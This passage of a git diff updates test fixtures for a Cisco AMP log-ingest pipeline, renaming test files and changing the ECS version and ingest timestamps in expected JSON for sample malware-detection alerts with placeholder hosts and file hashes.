"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3007,7 +3007,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3029,7 +3029,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469676331Z", + "ingested": "2021-09-13T18:06:41.546152267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3086,7 +3086,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3108,7 +3108,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469678203Z", + "ingested": "2021-09-13T18:06:41.546154327Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3174,7 +3174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3206,7 +3206,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469680172Z", + "ingested": "2021-09-13T18:06:41.546156486Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3267,7 +3267,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3299,7 +3299,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469682061Z", + "ingested": "2021-09-13T18:06:41.546158553Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3356,7 +3356,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3384,7 +3384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469683932Z", + "ingested": "2021-09-13T18:06:41.546160597Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3441,7 +3441,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3469,7 +3469,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469685813Z", + "ingested": "2021-09-13T18:06:41.546162684Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3526,7 +3526,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3548,7 +3548,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469687673Z", + "ingested": "2021-09-13T18:06:41.546164735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3606,7 +3606,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3626,7 +3626,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469689561Z", + "ingested": "2021-09-13T18:06:41.546166865Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "kind": "alert", "start": "2021-01-15T10:17:41.000Z", @@ -3686,7 +3686,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3708,7 +3708,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469691446Z", + "ingested": "2021-09-13T18:06:41.546168922Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3765,7 +3765,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3791,7 +3791,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469693323Z", + "ingested": "2021-09-13T18:06:41.546175169Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json index fb0cb6dbbed..bcf087a5dee 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -34,7 +34,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581709368Z", + "ingested": "2021-09-13T18:06:53.271886158Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -91,7 +91,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -117,7 +117,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581713543Z", + "ingested": "2021-09-13T18:06:53.271892093Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -174,7 +174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -200,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581715796Z", + "ingested": "2021-09-13T18:06:53.271894245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -257,7 +257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -283,7 +283,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581730632Z", + "ingested": "2021-09-13T18:06:53.271896176Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 